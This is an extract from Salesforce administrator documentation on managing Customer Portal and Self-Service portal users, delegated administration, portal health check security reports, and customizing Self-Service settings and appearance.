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• You can’t delete an active portal user; you can only disable or deactivate his or her access to the portal.
• The following table describes whether you can delete contacts that are associated with portal users:

Can You Delete the Contact?State of Portal User Associated to Contact

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Active portal user

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Inactive portal user

Yes. Deleted contacts are sent to the Recycle Bin.Disabled portal user

• To delete a portal-enabled contact, first disable the portal user, then delete the contact.
• Cases associated with a portal user are not updated in any way when you disable or deactivate the portal user. For example,

if a portal user owns a case, and the portal user is disabled, he or she remains the owner of the case until the case is updated
with a new owner.

• Before you disable a partner user, we recommend that you transfer any opportunities owned by the user to another user
who will remain active. This is because when you disable a partner user, any opportunities he or she owns are removed
from your organization’s forecast hierarchy (the partner user’s role becomes obsolete).

• After you disable a portal user, it may take Salesforce up to ten seconds to disable the user. During that time, a portal user
may still perform actions on a portal.

• You can remove the Disable Customer User and Disable Partner User buttons from contact page layouts at any time.
Doing so would prevent users with the “Edit Self-Service Users” or “Manage External Users” permissions from disabling
portal users.

• A disabled or deactivated portal user does not count against your organization’s available user licenses. However, disabling
or deactivating a portal user does not reduce the number of licenses for which your organization is billed; you must change
your organization’s license count to change your billing.

• To disable all portal users associated with an account and permanently delete all of the account’s portal roles and groups:

◊ Click Manage External Account and choose Disable Partner Account on a partner portal account.
◊ Click Manage External Account and choose Disable Customer Account on a Customer Portal account or Customer

Portal person account.

You can remove the Disable Customer Account and Disable Partner Account buttons from account page layouts at any
time. Doing so would prevent users with the “Edit Self-Service Users” or “Manage External Users” permissions from
disabling portal accounts.

• When you disable a portal user or portal account, the change is tracked in the setup audit trail.
• Portal roles are not removed from disabled portal users associated with person accounts. However, you can remove the

portal roles manually:

1. From Setup, click Manage Users > Users.
2. Select the name of a disabled portal user.
3. Click Edit.
4. Select None from the Role drop-down list.
5. Click Save.

See Also:
Enabling the Customer Portal for Contacts and Person Accounts
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Editing Customer Portal User Information
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Customer Portal users:

“Manage Users”To manage profiles and permission sets:

“Customize Application”To create, edit, and delete page layouts:

“Customize Application”To set field-level security:

“Manage Users”To set sharing rules:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can edit Salesforce Customer Portal user information for contacts associated with accounts you have permission to access.
To edit information for a Customer Portal user:

1. From Setup, click Manage Users > Users.
2. Click Edit next to a user’s name.
3. Change the necessary information and click Save.

Tips for Editing Customer Portal User Information

Consider the following when editing Customer Portal user information:

• You can create a custom list view to display only Customer Portal users by filtering on the Customer Portal Manager
license type, Customer Portal User license type, or both. For example, use the criteria “License Type equals Customer
Portal User, Customer Portal Manager.”

• When generating a new password for a user, the new password is automatically sent to the user’s email address and email
verification is not enforced.

• You can include the Customer Portal Welcome component on home page layouts assigned to Customer Portal users so
that when they log in to your portal they receive a welcome message with their name, plus the ability to change their own
portal username, password, locale, language, time zone, and contact information. When portal users change information
about themselves their user record is updated but their contact record is not automatically updated with those changes.

See Also:
About Customer Portal User Management
Disabling and Deactivating Portal Users
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Resetting Customer Portal User Passwords
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To reset Customer Portal users' passwords:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

If a Salesforce Customer Portal user loses his or her password, the user can click the Forgot your password? link on the
Customer Portal login page to have a new password emailed to him or her.

To reset a Customer Portal user's password:

1. From Setup, click Manage Users > Users.
2. Select the checkbox next to the user’s name. Optionally, to change the passwords for all currently displayed users, check

the box in the column header to select all rows.
3. Click Reset Password to have a new password emailed to the user.

Tip:  You can include the Customer Portal Welcome component on home page layouts assigned to Customer Portal
users. Each Customer Portal user who logs in to your portal receives a welcome message with his or her name. The
users can also change their own portal username, password, locale, language, time zone, and contact information.
When portal users change information about themselves their user records are updated but their contact records aren’t
automatically updated with those changes.

See Also:
About Customer Portal User Management
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Delegating Customer Portal User Administration and Portal
Super User

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delegated External User Administrator”To manage Customer Portal users:

“Manage Users”To create, edit, and delete profiles:

“Portal Super User”To view and edit all cases and contacts for an account:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can delegate some administrative rights to Customer Portal users with the Customer Portal Manager Custom user license.
Delegated external user administrators can do the following for external users, including both customer users and partner users,
associated with their own account:

• Create new external users

• Edit existing external users

• Reset passwords for external users

• Deactivate existing external users

Note: When a delegated external user administrator deactivates a portal user, the administrator doesn't have the
option to remove the portal user from any teams that user is a member of.

Delegated external user administrators can also view their account’s detail page, along with contacts and cases related to their
account via the Accounts tab. In addition, delegated external user administrators receive the “Portal Super User” permission.
This permission lets delegated external user administrators do the following for their own account:

• View and edit all cases

• Create cases for contacts

• View and edit all contacts, whether portal enabled or not

• View account details when they’re the contact on a case

• Report on all contacts, whether portal enabled or not, if the Reports tab is added to your Customer Portal and the user
has the “Run Reports” permission

You can add just the “Portal Super User” permission to the profiles of external users (except for high-volume portal users) so
that they have access to their account and can view and edit all of its cases and contacts without having the ability to manage
other external users. However, super users can’t view the Contacts tab on the Customer Portal without the Delegated External
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User Administrator permission. To edit contacts, super users must select a contact from a case record. For more information,
see:

• Delegating External User Administration Rights

• Providing Users with the “Portal Super User” Permission

• Tips on Setting Up Delegated Customer Portal User Administration

Delegating External User Administration Rights

Note:  You must use the original profile user interface to delegate administration rights for external users. If you’re
using the enhanced profile user interface, disable it temporarily in the User Interface settings to complete this procedure.

To delegate External User Administration Rights:

1. From Setup, click Manage Users > Profiles and click a custom Customer Portal profile.

You can’t add delegation rights or the “Portal Super User” permission to the standard Customer Portal Manager, Customer
Portal User, or High Volume Customer Portal profiles.

2. Click Edit.
3. Select Delegated External User Administrator.

When you select Delegated External User Administrator, the Portal Super User is automatically selected after you click
Save.

4. Click Save.
5. In the Delegated External Users Profiles related list, click Edit.
6. Select the external user profiles you want users with this profile to be able to administer. An external user delegated

administrator can manage external users with Customer Portal, partner portal, or Communities profiles, as long as the
users with the profile are under the same account.

7. Click Save.

To change which profiles a delegated Customer Portal user administrator can edit:

1. From Setup, click Manage Users > Profiles and click a custom Customer Portal profile.
2. Click Edit in the Delegated External User Profiles related list.
3. Select the external user profiles you want this profile to be able to administer.
4. Click Save.

Delegated Customer Portal administrators can perform the following tasks from a contact’s detail page:

• Click Enable Customer Portal User to allow a contact to use a Customer Portal.
• Click View Customer Portal User to view the Customer Portal user’s details. From a Customer Portal user’s detail page,

delegated Customer Portal users can:

◊ Click Edit to edit a Customer Portal user’s details.
◊ Click Reset Password to reset the Customer Portal user’s password.
◊ Click Edit and deselect the Active checkbox to deactivate the user.

Providing Users with the “Portal Super User” Permission

To provide users with the “Portal Super User” permission:

1. From Setup, click Manage Users > Profiles and click a custom Customer Portal profile.
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You can’t add the “Portal Super User” permission to the standard Customer Portal Manager, Customer Portal User, or
High Volume Customer Portal profiles.

2. Click Edit.
3. Select Portal Super User.
4. Click Save.

Tip:  To report on profiles with the “Portal Super User” permission:

1. Note the names of profiles with the “Portal Super User” permission.
2. Select the Reports tab.
3. From the Administrative Reports folder, select the All Active Users report.

Tips on Setting Up Delegated Customer Portal User Administration

Consider the following when setting up delegated Customer Portal User Administration:

• On the profile of users you are granting delegated portal administration:

◊ Add the “Create” and “Edit” permissions on contacts so that delegated portal administrators and users with the “Portal
Super User” permission can create and update contacts related to their account.

◊ Set the Accounts and Contacts tab settings to Default On so that delegated portal administrators can view the Accounts
and Contacts tabs and easily manage contacts related to their accounts.

• Add the Accounts and Contacts tabs to your Customer Portal.
• Set field-level security and page layouts so that delegated Customer Portal user administrators and portal super users can

only access the account, contact, and case fields you specify.

Note:  To allow portal super users to create cases for contacts other than themselves, set the field-level security
on the Contact Name field on cases to Editable.

• Customer Portal users are prevented from viewing related lists to objects they don’t have access to. For example, if a
Customer Portal user views a contact, and the contact page layout includes the Opportunities related list, the portal user
can’t view the Opportunities related list because portal users don’t have access to opportunities.

• Delegated Customer Portal user administrators can update portal users on any account to which they are transferred.
• You can set account sharing rules to extend delegated Customer Portal user administrators’ access beyond their own

accounts.

See Also:
About Customer Portal User Management
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CUSTOMER PORTAL HEALTH

Portal Health Check Overview
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Modify All Data”

To view portal health check reports:

Customer Portals and partner portals let you collaborate with and provide services to your customers and partners. With
portals, you share and capture information from third-party users. To ensure that you don't expose more information than
intended, it's important to follow best practices for portal implementation.

Your customers and partners can access your information via portals in many ways. With portal health check reports, you can
easily monitor this access. Portal health check reports show your security-related portal settings and provide information you
can use to improve portal security.

Note:  Portal health check reports show sensitive user permissions, object permissions, and field permissions granted
through profiles, as well as organization-wide sharing settings and sharing rules. Your portal users can also access
records via the following means, which aren't included in portal health check reports.

• Permission sets

• Manual sharing

• Apex managed sharing

• Territories

• List views

• Groups

• Queues

• Teams

• Content libraries

• Folders

To view portal health check reports, from Setup, click Security Controls > Portal Health Check, then click the report you
want.

The following reports are included:
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• Administrative and User Permissions

• Object Access and Field-Level Security

• Sharing Organization-Wide Defaults

• Sharing Rules

Note: The portal health check reports don't include information for criteria-based sharing, high-volume portal users,
or Self-Service portal users.

Viewing the Administrative and User Permissions Report
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Modify All Data”

To view portal health check reports:

User permissions are powerful, as they expand users' access to data. It's important to use caution when setting permissions for
a profile.

The Administrative and User Permissions report—one of the portal health check reports—shows portal profiles and their
critical permission settings.

Note:  This report doesn't show permissions granted through permission sets.

For each profile, the report lists the number of portal users assigned to it, and the following permission settings:

• Delegated External User Administrator

• Send Email

• Convert Leads

• Edit Events

• Edit Opportunity Product Sales Price

• Edit Tasks

• Transfer Cases

• Portal Super User

• API Enabled

• Password Never Expires

• Create Workspaces
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• View Content in Portals

• Export Reports

• Run Reports

Note:  Depending on your organization's settings, some permissions may not appear in the report.

From the report, you can drill down to portal profile detail pages, where you can edit or clone a profile, or view the users
assigned to a profile.

To view this report:

1. From Setup, click Security Controls > Portal Health Check.
2. Click Administrative and User Permissions.

From the report page, you can do any of the following:

• To view a profile detail page, click the profile name.

• To show a filtered list of items, select a predefined view from the drop-down list.

• To return to the list of reports, click Back to list: Portal Health Check Reports.

See Also:
Portal Health Check Overview

Viewing the Object Access and Field-Level Security Report
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Modify All Data”

To view portal health check reports:

Object permissions specify the access that users have to standard and custom objects. The following object permissions respect
the sharing model:

• Read—Users can only view records of this type.

• Create—Users can read and create records.

• Edit—Users can read and update records.

• Delete—Users can read, edit, and delete records.
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Field-level security specifies the access that users have to specific fields in object records.

The Object Access and Field-Level Security report—one of the portal health check reports—shows the number of portal
profiles that can access each standard and custom object in your organization. You can view each object's field-level security
settings and permissions. The object-specific reports list portal profiles, showing the number of users assigned to each profile,
the number of visible fields in an object, and the object permissions. You can drill down to portal profile detail pages, where
you can edit or clone a profile, or view the users assigned to a profile. You can also drill down to field-level security detail
pages, where you can edit the settings.

Note: The Object Access and Field-Level Security report doesn't show permissions granted through permission sets.

To view this report:

1. From Setup, click Security Controls > Portal Health Check.
2. Click Object Access and Field-Level Security.
3. From the report page, click an object name to view its field-level security settings and permissions by profile.

On the object detail page, you can do any of the following:

• To view a profile detail page, click the profile name.
• To view a profile's field-level security detail page, click visible fields.
• To return to the high-level object access and field-level security report, click Object Access and Field-Level Security.

From both report pages, you can do any of the following:

• To show a filtered list of items, select a predefined view from the drop-down list.

• To return to the list of reports, click Back to list: Portal Health Check Reports.

See Also:
Portal Health Check Overview
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Viewing the Sharing Organization-Wide Defaults Report
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Modify All Data”

To view portal health check reports:

“Manage Users”

AND

“Customize Application”

To set default sharing access:

Organization-wide default settings specify each object's default access level for users in your organization. If an object's default
access level is Public, users with enabled object permissions (“Read,” “Create,” “Edit,” or “Delete”) may be able to access records
that they don't own. For example, if the default access setting for the account object is Public Read/Write, then any user with
the “Read” permission on the account object can view any account record. When setting organization-wide defaults, you want
to make sure you don't let portal users see objects they shouldn't access.

The Sharing Organization-Wide Defaults report—one of the portal health check reports—lists standard and custom objects
and the default access setting for each object. You can use this report to review and edit the organization-wide default settings
that may expose records to portal users.

To view this report:

1. From Setup, click Security Controls > Portal Health Check.
2. Click Sharing Organization-Wide Defaults.

The report lists the default access setting for each object. If an object's default access is Public, Show Details (for calendar),
or Use (for price book), any portal users with enabled object permissions can access other users' records, and the Security
column indicates a weak organization-wide default setting. You can view the specific object permissions granted to portal
profiles in the Object Access and Field-Level Security report.

If the object's default access is Private, Hide Details (for calendar), or No Access (for price book), the Security column
indicates a strong organization-wide default setting.

Note: Even with a strong organization-wide default setting, portal users may have access to other users' records
through exceptions such as sharing rules.

If Grant Access Using Hierarchies is checked, any user above a record owner in a territory or role hierarchy can
access the owner's records for that object.

From the report page, you can do any of the following:
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• To change the organization-wide sharing settings for any object, click Edit, then change the settings on the
Organization-Wide Sharing Defaults Edit page.

• To show a filtered list of items, select a predefined view from the drop-down list.

• To return to the list of reports, click Back to list: Portal Health Check Reports.

See Also:
Portal Health Check Overview

Viewing the Sharing Rules Report
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Modify All Data”

To view portal health check reports:

“Manage Users”To create and edit sharing rules:

Administrators can use sharing rules to give users access to records they don't own. In a sharing rule, records owned by a set
of users (such as a group, role, or territory) are shared with another set of users. When creating sharing rules, you want to make
sure you don't let portal users see records they shouldn't access.

The Sharing Rules report—one of the portal health check reports—lists all sharing rules that give portal users access to records
they don't own. It shows the number of portal users who may get access to records as a result of each sharing rule, and lets
you edit access levels for each rule. For some types of user sets (like groups, roles, and territories), you can drill down to detail
pages, where you can edit, delete, or manage the users in the set.

To view this report:

1. From Setup, click Security Controls > Portal Health Check.
2. Click Sharing Rules.

The Number of Portal Users Affected column shows the number of portal users who may get access as a result of the
sharing rule. This number includes portal users specified in the rule and, if Grant Access Using Hierarchies is enabled
for the object, any portal users above them in the role or territory hierarchy. If any users in this set have enabled object
permissions (“Read,” “Create,” “Edit,” or “Delete”), they can access records exposed by the rule.

Note:

• The Sharing Rules report doesn't include criteria-based sharing rules.
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• The Sharing Rules report doesn't check portal users' object permissions. You can view the specific object
permissions granted to portal profiles in the Object Access and Field-Level Security report.

From the report page, you can do any of the following:

• To change the access level in a sharing rule, click Edit, then change the settings on the sharing rule edit page.

• To view the details of a user set in a sharing rule, click the link in the Owned By or Shared With column.

• To show a filtered list of items, select a predefined view from the drop-down list.

• To return to the list of reports, click Back to list: Portal Health Check Reports.

Note: Account and account territory sharing rules can grant access to contacts, opportunities, and cases associated
with the shared accounts. The Sharing Rules report shows access levels only for top-level objects, not associated
objects.

See Also:
Portal Health Check Overview

SELF-SERVICE PORTAL

Self-Service Jump Start
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To use Self-Service Jump Start:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Get your Self-Service portal running quickly using the Jump Start button. It automates the setup process by choosing some
default settings for you.

Note: You can’t save any JavaScript as part of your custom code.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Settings > Jump Start.
2. Review the process and click Continue.
3. Choose a color theme.
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4. Edit the default settings as needed and click Save.
5. Test your Self-Service portal by:

a. Clicking Generate to retrieve a test username and password.
b. Clicking Access Self-Service Portal to preview your pages.
c. Optionally, click Invite to notify other users how to log in and preview your pages.

6. Enable your Self-Service portal by copying the link provided in the Enable Self-Service... section to an appropriate place
on your website.

7. Click Done when finished.
8. Enable your customers to use your Self-Service portal. See Managing Self-Service Users on page 2016.

Tip:  To make changes to your settings, see Enabling Self-Service Features and Settings on page 1996. The Self-Service
Jump Start automatically enables the Enable Self-Service button on contact detail pages.

See Also:
Setting Up Self-Service
Administrator tip sheet: Getting the Most from Your Self-Service Portal
Administrator setup guide: Self-Service Implementation Guide

Setting Up Self-Service
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To use Self-Service Jump Start:

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Self-Service provides an online support channel for your customers - allowing them to resolve their inquiries without contacting
a customer service representative.

Setting up your Self-Service portal is simple. Choose from two setup options:

• Jump Start - Gets you up and running quickly; see Self-Service Jump Start on page 1994.

• Self-Service Setup - Complete setup which allows you more customization. The setup consists of:
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◊ Enabling Self-Service Features and Settings on page 1996

◊ Customizing Your Self-Service Look and Feel on page 2000

◊ Customizing Your Self-Service Fonts and Colors on page 2001

◊ Customizing Your Self-Service Pages on page 2002

◊ Generating Login HTML on page 2014

◊ Managing Self-Service Users on page 2016

See Preparation for Setting Up Your Portal to learn more about implementing Self-Service.

See Also:
Self-Service Jump Start
Customizing Your Self-Service Look and Feel
Customizing Your Self-Service Fonts and Colors
Administrator tip sheet: Getting the Most from Your Self-Service Portal
Administrator setup guide: Self-Service Implementation Guide

Enabling Self-Service Features and Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Settings.
2. Click Self-Service Setup on the Self-Service Settings page.
3. Set the following options:

DescriptionSetting

Allows users to log into the Self-Service portal.Login Enabled

Displays the Enable Self-Service button on contact detail
pages. Or, for contacts in which Self-Service is already
enabled, the View Self-Service button displays.

Edit Self-Service Users
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DescriptionSetting

The URL of the web page that will be displayed when users
log out of the Self-Service portal, for example,

Logout URL

http://www.acme.com. If a logout URL is not specified,
the Logout button does not display to users.

The default origin assigned to all cases submitted via the
Self-Service portal. Available values are taken from your

Default Case Origin

organization's Case Origin picklist. You can assign
different default origins for cases submitted via Self-Service
and Web-to-Case.

Automatically selects the Visible in Self-Service
Portal checkbox for all new cases, including cases created

New Cases Visible in Portal

via Web-to-Case, Email-to-Case, and On-Demand
Email-to-Case.

Regardless of this default, users creating new cases can
manually set the Visible in Self-Service Portal
checkbox.

Enables solution categories in the Self-Service portal so that
customers can browse solutions by category.

If multilingual solutions is enabled, you can translate solution
categories.

Enable Solution Browsing

The top-level category accessible by customers in the
Self-Service portal. Customers can view all solutions marked

Top-Level Category for Self-Service Portal

Visible in Self-Service Portal in this category
and its subcategories.

Leave this blank to let customers view all solutions marked
Visible in Self-Service Portal in all categories.

The record type to assign to any case submitted via the
Self-Service portal.

Case Record Type

The email address from which all new user and password
emails will be sent, for example, support@acme.com.
When this field is blank, Salesforce uses:

"From" Email Address

• The Automated Case User's email address for users who
receive an email with a temporary password by clicking
Forgot your password? on the Login Page of the
Self-Service portal. The Automated Case User is
specified from Setup, in Customize > Cases > Support
Settings.

• The email address of the user who last posted a comment
for users who receive a case comment notification email.
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DescriptionSetting

The name that will be associated with the “From” Email
Address, for example, “Acme Customer Support.” When
this field is blank, Salesforce uses:

"From" Email Name

• Your organization's name for users who receive an email
with a temporary password by clicking Forgot your
password? on the Login Page of the Self-Service portal.

• The name of the user who last posted a comment for
users who receive a case comment notification email.

The email template used to send a username and initial
password to all newly-enabled Self-Service users. Self-Service

New User Template

automatically selects a sample template for you, but you can
modify the sample or create your own email template. This
template must be marked as “Available for Use.”

The email template used to send a new password to existing
Self-Service users when you reset their passwords or when

New Password Template

they reset their own passwords by clicking Forgot your
password? on the Login Page of the Self-Service portal.
Self-Service automatically selects a sample template for you,
but you can modify the sample or create your own email
template. This template must be marked as “Available for
Use.”

When selected, indicates that the Send Customer
Notification option on a case comment is displayed.

Even if this checkbox is not selected, the Send Customer
Notification option still displays on cases if you have

Enable Notification Email on New Case
Comment

enabled email notifications to contacts who are not members
of your Self-Service portal. See Customizing Support
Settings on page 2156.

The email template used to send a notification to
Self-Service users when a public comment is added to one

New Comment Template

of their cases. Self-Service automatically selects a sample
template for you, but you can modify the sample or create
your own email template. This template must be marked as
“Available for Use.”

Note that case owners are sent a separate notification that
you can't customize.

Indicates if cases submitted through your Self-Service portal
will trigger your auto-response rules.

Enable Case Auto-Response Rules for
Self-Service Cases

The email template to use when cases submitted through
your Self-Service portal do not match any auto-response
rules.

Case Creation Template
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DescriptionSetting

The maximum pixel width of the Self-Service pages from
Salesforce. If hosting the portal yourself, this is the width
of the inner HTML frame on your Self-Service login page.

Maximum Page Width

The minimum pixel height of the Self-Service pages from
Salesforce.

Minimum Page Height

The complete, publicly accessible URL of your organization’s
Self-Service style sheet, for example,

Style Sheet URL

“http://www.acme.com/styles/selfservice.css.” See
Customizing Your Self-Service Look and Feel on page 2000.

If you use a predefined color theme, leave this field blank.

Use one of Salesforce’s color themes if you do not have your
own style sheet to use. Click the View link to see template

Color Theme

settings. To change the fonts and colors of one of Salesforce’s
color themes, see Customizing Your Self-Service Fonts and
Colors on page 2001.

Term used on the Self-Service portal instead of “case”
(singular form).

Case Single Term

Term used on the Self-Service portal instead of “cases”
(plural form).

Case Plural Term

Term used on the Self-Service portal instead of “solution”
(singular form).

Solution Single Term

Term used on the Self-Service portal instead of “solutions”
(plural form).

Solution Plural Term

4. Click Save to save your Self-Service settings.

See Also:
Setting Up Self-Service
Administrator tip sheet: Getting the Most from Your Self-Service Portal
Administrator setup guide: Self-Service Implementation Guide
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Customizing Your Self-Service Look and Feel
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

To develop a meaningful look and feel for your Self-Service portal:

1. Customize the headers and footers of the Self-Service pages; see Create Your Custom Page Header and Footer Sections
on page 2011.

2. Customize the Self-Service portal fonts and colors via one of these options:

• Choose a predefined color theme or upload your own style sheet on page 2004.
• Customize fonts and colors using a point-and-click editor on page 2001.

See Also:
Setting Up Self-Service
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Customizing Your Self-Service Fonts and Colors
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can customize the fonts and colors of the Self-Service portal to reflect your company’s branding. Your portal’s fonts and
colors are specified in a portal “color theme.” Select a predefined color theme and customize it using a point-and-click editor.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Fonts and Colors. Salesforce offers predefined
themes that you can customize. Click Preview to view any theme.

2. Select the color theme you want to customize.

From the color theme page, you can:

• Click the Reset to Default link to remove all customizations from a theme.
• Click the Back to All Themes link to return to the list of color themes.
• Click Preview Theme Nameto view the theme you are customizing.

3. Choose a portal page to customize. Color themes are customized page-by-page with some page elements being shared by
multiple pages.

From the portal page, you can:

• Click See Examples to see all of the elements that you can customize.
• Click Clear next to an element to remove customizations.
• Click Preview Theme Name to view the theme you are customizing.
• Click the Back to All Pages link to return to the list of all portal pages.

4. Click Edit next to the visual element you want to customize. Some elements are visible only on the selected portal page,
and some are shared across multiple portal pages. Changes you make to shared elements affect all pages.

Note:  Depending on the visual element, you can customize attributes using a point-and-click editor or a custom
style sheet editor which lets you modify the cascading style sheets (CSS) directly. Choose the click here link to
switch between the two. If you are using the point-and-click editor, select the Show advanced attributes box to
access the click here link. We recommend that only users familiar with cascading style sheets (CSS) define them.

5. Edit the visual element as desired.
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If you are using the point-and-click editor:

• Click Edit next to a basic or advanced attribute. If you do not see the advanced attributes, select the Show advanced
attributes box.

• In the popup window, change the attribute as needed.
• Click OK to confirm your changes in the popup window.

If you are using the custom style sheet editor, enter valid CSS code.

For a list of all the page attributes you can edit, see Self-Service Page Attributes on page 2012.

6. Click Save to save all changes to the visual element and its attributes. Customizations are not visible to your Self-Service
users until you set the color theme as active.

7. Repeat these steps to customize all visual elements and their attributes as necessary.
8. Return to the list of color themes by clicking the Back to All Pages link and then the Back to All Themes link.
9. Click Set Active Theme.
10. Select the theme to activate for your portal, live and in real-time. Your organization can only have one active theme.
11. Click Save.

Note:  Since changes to an active theme take effect immediately, we recommend that you fully customize a theme
before activating it so as not to disturb your customers.

See Also:
Setting Up Self-Service

Customizing Your Self-Service Pages
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

1. From Setup, click Customize > Self-Service >  Self-Service Portal > Settings.
2. Make the necessary enhancements to any Self-Service pages. See the following for more information:

• Customize the Login Page
• Customize the Home Page
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• Enable the Solutions Page
• Customize the Log a Case Page
• Customize the View Cases Page
• Customize the Suggested Solutions Page

Note:

• You cannot create multiple versions of the same Self-Service portal page. However, you can customize each
Self-Service page.

• Salesforce Knowledge articles do not display in the Self-Service portal.

See Also:
Setting Up Self-Service
Customize the Self-Service Style Sheet
Self-Service Page Attributes
Create Your Custom Page Header and Footer Sections

Preparation for Setting Up Your Portal
Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Before setting up your Self-Service portal or your Salesforce Customer Portal:

• Build your public solutions - Review and mark your solutions as Visible in Self-Service Portal. Only solutions
marked Visible in Self-Service Portal can appear in the Self-Service portal or the Customer Portal. For your
Self-Service portal only, identify the top five solutions you want to feature on the Home Page.

• Determine the information to show and collect - Decide which case fields will be available when users view their cases.
You should also decide which fields should be required when users submit cases online and which picklist values users can
select when they solve their own cases with suggested solutions. (See Case Fields on page 1672.)

• Designate the portal's location - Choose where to add your portal's login URL on your corporate website. To locate the
login URL for your Self-Service portal, see Generating Login HTML on page 2014; to locate the login URL for your
Customer Portal.

• Customize your portal communication templates - Decide which email templates to send to users to communicate a
variety of information, such as reset passwords, notifications when public comments are added to cases, and case
auto-responses with suggested solutions.

• Customize and distribute the portal tip sheet - Download the Using the Self-Service Portal and Customer Portal tip
sheet and edit it to match your portal's branding and features, such as suggested solutions and the ability to attach files to
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submitted cases. Then distribute the document to your customers who want to learn how to answer their own inquiries
using your portal.

See Also:
Setting Up Self-Service
Customize the Self-Service Style Sheet

Customize the Self-Service Style Sheet

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Select a predefined color theme, or download a sample Self-Service color theme so you can customize it. This color theme
allows you to incorporate your organization’s branding into your Self-Service portal.

Note:  To customize the Self-Service color theme using a point-and-click editor, see Customizing Your Self-Service
Fonts and Colors on page 2001.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Settings.
2. Click Self-Service Setup.
3. Click the View Color Theme Options link in the page settings section.
4. Find a set of fonts and colors you like and click Download This Color Theme.

To use a predefined color theme without customizing it, simply click Select This Color Theme.

5. Save the color theme you downloaded and give it to your webmaster if it needs more customization. The downloaded color
theme is a CSS style sheet that your webmaster can edit.

6. Store the downloaded style sheet in a publicly accessible location and enter the URL for your style sheet in the Style
Sheet URL field.
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7. Click Save.

See Also:
Setting Up Self-Service

Customize the Login Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can customize the content of the Self-Service Login Page from the Self-Service Portal Pages related list. The Login Page
is the first page that users see and prompts them for a username and password. Users can click Forgot your password? to
automatically reset their passwords and receive a temporary password via email. Users are required to change their temporary
password when logging in. For details on setting up the new password template, see New Password Template on page 1998.

1. To customize this page, click Edit next to the Login Page listed.
2. Check Show Message to display your message on the login page.
3. Insert a page message. Use the format toolbar to format your page message. You can’t save any JavaScript as part of your

custom code.

Optionally, check Show HTML to view your page message in HTML code.

4. Click Save.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages
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Customize the Home Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

